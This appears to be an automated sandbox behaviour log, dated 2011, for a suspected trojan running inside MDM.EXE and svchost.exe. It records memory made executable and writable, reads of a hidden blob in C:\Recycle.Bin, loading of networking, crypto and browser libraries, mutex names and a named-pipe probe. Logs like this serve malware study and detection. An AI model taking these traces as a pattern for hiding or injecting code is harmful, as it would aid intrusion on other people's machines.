Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321222787
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321224309
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2321228437
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321230911
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321231225
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321231616
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321232616
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321237139
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321239868
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321240172
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321240562
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321241570
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321245440
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321248233
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321248536
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321248927
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321249931
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321253793
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321256581
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321256879
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321257555
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321258550
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321262365
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321265168
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321265471
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2321266396
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2321267391
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321278759
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321295712
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321299566
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321304070
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321308387
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321312877
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321316721
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321321177
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321325099
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321329605
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321333477
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321338275
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321342536
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321347087
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321350929
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321355552
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2321359647
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321363292
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2321367435
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321371908
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2321376142
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2321379691
Thread created PID: 2224 TID: 3364 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321381259
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2321390862
Thread delayed Time: 0 TID: 12904 success or wait 2322230674
Thread delayed Time: 0 TID: 12904 success or wait 2322286790
Thread delayed Time: 0 TID: 12904 success or wait 2322287289
Thread delayed Time: 0 TID: 12904 success or wait 2323349279
Thread delayed Time: 0 TID: 12904 success or wait 2323405417
Thread delayed Time: 0 TID: 12904 success or wait 2323405902
Thread delayed Time: 0 TID: 12904 success or wait 2324467520
Thread delayed Time: 0 TID: 12904 success or wait 2324523779
Thread delayed Time: 0 TID: 12904 success or wait 2324524278
Thread delayed Time: 0 TID: 12904 success or wait 2325586143
Thread delayed Time: 0 TID: 12904 success or wait 2325642289
Thread delayed Time: 0 TID: 12904 success or wait 2325642789
Thread delayed Time: 0 TID: 12904 success or wait 2326962012
Thread delayed Time: 0 TID: 12904 success or wait 2326962423
Thread delayed Time: 0 TID: 12904 success or wait 2326962830
Thread delayed Time: 0 TID: 12904 success or wait 2328049017
Thread delayed Time: 0 TID: 12904 success or wait 2328049194
Thread delayed Time: 0 TID: 12904 success or wait 2328049365
Thread delayed Time: 0 TID: 12904 success or wait 2329166319
Thread delayed Time: 0 TID: 12904 success or wait 2329166498
Thread delayed Time: 0 TID: 12904 success or wait 2329166668
Thread delayed Time: 0 TID: 12904 success or wait 2330286411
Thread delayed Time: 0 TID: 12904 success or wait 2330286928
Thread delayed Time: 0 TID: 12904 success or wait 2330287533
Thread delayed Time: 0 TID: 12904 success or wait 2331404971
Thread delayed Time: 0 TID: 12904 success or wait 2331405478
Thread delayed Time: 0 TID: 12904 success or wait 2331405975
Thread delayed Time: 0 TID: 12904 success or wait 2332523710
Thread delayed Time: 0 TID: 12904 success or wait 2332524247
Thread delayed Time: 0 TID: 12904 success or wait 2332524753
Thread delayed Time: 0 TID: 12904 success or wait 2333642280
Thread delayed Time: 0 TID: 12904 success or wait 2333642803
Thread delayed Time: 0 TID: 12904 success or wait 2333643311
Thread delayed Time: 0 TID: 12904 success or wait 2334760756
Thread delayed Time: 0 TID: 12904 success or wait 2334761264
Thread delayed Time: 0 TID: 12904 success or wait 2334761765
Thread delayed Time: 0 TID: 12904 success or wait 2335879395
Thread delayed Time: 0 TID: 12904 success or wait 2335879903
Thread delayed Time: 0 TID: 12904 success or wait 2335880402
Thread delayed Time: 0 TID: 12904 success or wait 2336997748
Thread delayed Time: 0 TID: 12904 success or wait 2336998269
Thread delayed Time: 0 TID: 12904 success or wait 2336998777
Thread delayed Time: 0 TID: 12904 success or wait 2338116270
Thread delayed Time: 0 TID: 12904 success or wait 2338116772
Thread delayed Time: 0 TID: 12904 success or wait 2338117264
Thread delayed Time: 0 TID: 12904 success or wait 2339238004
Thread delayed Time: 0 TID: 12904 success or wait 2339238600
Analysis File: svchost.exe PID: 2264 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k imgsvc
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 930000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 9B0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit DA0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E20000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E20000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E20000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E20000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E20000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 9A06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3348 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 9A0639
3344 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3380 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3352 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3372 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13124 0s success or wait 195 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3348 2264 success or wait 0 9A0279
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2323688534
Thread created PID: 2264 TID: 3348 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323691779
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2323695634
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2323697108
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2323719156
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2323720707
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2323726900
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9B0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2323733218
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2323741214
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2323750522
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2323873418
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2323874939
Thread created PID: 2264 TID: 3344 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323879989
Thread delayed Time: 0 TID: 13124 success or wait 2323881643
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323883746
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: DA0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323888313
Thread created PID: 2264 TID: 3380 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323892775
Thread created PID: 2264 TID: 3352 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323895648
Thread delayed Time: 0 TID: 13124 success or wait 2323898856
Thread delayed Time: 0 TID: 13124 success or wait 2323899253
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323900565
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323904689
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323910005
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323914019
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323918376
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323922646
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323927013
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323931029
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2323935754
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2323938064
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2323939523
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323953054
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2323957930
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323962284
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323966817
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323971525
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323976587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323981276
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323985380
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323990873
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323995107
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2323999309
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2324000306
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324012572
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324016692
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324033588
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324037698
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324042424
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324046645
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324052370
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324056437
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324061232
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324065623
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324070286
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324074537
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324079649
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324083736
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324089553
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2324093838
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324098354
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2324102665
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324107405
